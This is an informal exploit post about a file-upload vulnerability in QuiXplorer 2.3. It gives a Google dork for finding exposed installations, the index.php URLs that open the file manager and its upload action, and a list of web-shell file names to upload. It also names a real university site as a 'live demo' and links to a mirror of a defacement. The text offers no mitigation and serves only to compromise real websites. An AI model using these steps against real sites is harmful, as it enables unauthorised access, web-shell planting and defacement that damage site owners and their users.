"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability"

open Google.com and type this dork 
intitle:"QuiXplorer 2.3 - the QuiX project"


you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity

http://[localhost]/[path]/index.php?action=list&order=name&srt=yes

http://site.com/[xyz]/index.php?action=list&order=name&srt=yes

 after Going to this you will saw a file manager 

you can upload your files here 

find this edit file create file etc icons in page and click on last, its upload option You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes after index.php? example :

http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file

click On you file For view 

Live demo : 

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  

i know some asshole will chnage the deface 

so its mirrOr of defacements http://attack-h.org/attack/?id=8452